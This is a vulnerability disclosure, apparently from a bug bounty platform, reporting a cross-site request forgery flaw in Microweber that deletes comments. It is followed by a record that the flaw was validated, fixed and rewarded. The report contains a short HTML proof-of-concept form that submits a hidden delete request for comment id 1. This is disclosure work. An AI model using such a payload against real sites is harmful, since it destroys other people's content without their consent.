Cross-Site Request Forgery (CSRF) in microweber/microweber


Reported on

Oct 22nd 2021


Hello Microweber team

I found a CSRF on deleting the comments :


  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />

after you run this PoC.html you can see that the comment with id 1 will be deleted.

We have contacted a member of the microweber team and are waiting to hear back 2 years ago
Peter Ivanov validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov marked this as fixed with commit 2cdf57 2 years ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
manage.php#L1-L11 has been validated
Model.php#L1-L63 has been validated
functions.php#L1-L200 has been validated
admin.php#L1-L18 has been validated
Api.php#L1-L241 has been validated
view.php#L1-L57 has been validated
Controller.php#L1-L32 has been validated
to join this conversation